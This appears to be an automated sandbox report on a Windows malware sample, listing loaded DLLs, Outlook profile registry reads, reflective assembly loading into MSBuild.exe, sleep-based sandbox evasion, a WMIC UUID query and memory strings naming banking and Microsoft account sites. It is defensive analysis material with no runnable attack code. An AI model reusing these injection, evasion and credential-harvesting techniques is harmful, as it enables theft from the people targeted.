                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Ycj3d5NMhc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Ycj3d5NMhc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Ycj3d5NMhc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\Administrator\Desktop\Outputs\Evop.pdb source: Ycj3d5NMhc.exe

                  Data Obfuscation

                  barindex
                  Source: Ycj3d5NMhc.exe, PreventFromWeb.cs.Net Code: FOBDestination System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0592BFC9 push 9C058843h; retf 3_2_0592BFD5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D0C03 push eax; mov dword ptr [esp], ecx3_2_059D0C14
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D22D3 push eax; mov dword ptr [esp], ecx3_2_059D22E4
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD6E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA04
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD6C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADAA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD0E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD784
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD384
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD424
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE654
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD304
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD924
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD2E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD664
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AF3F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AF314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1A4
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory allocated: 1A680000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 623Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2959Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe TID: 4540Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3840Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5964Thread sleep count: 623 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5964Thread sleep count: 2959 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 964Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1996Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Ycj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1530669703.0000000006FC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1521409264.0000000000C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
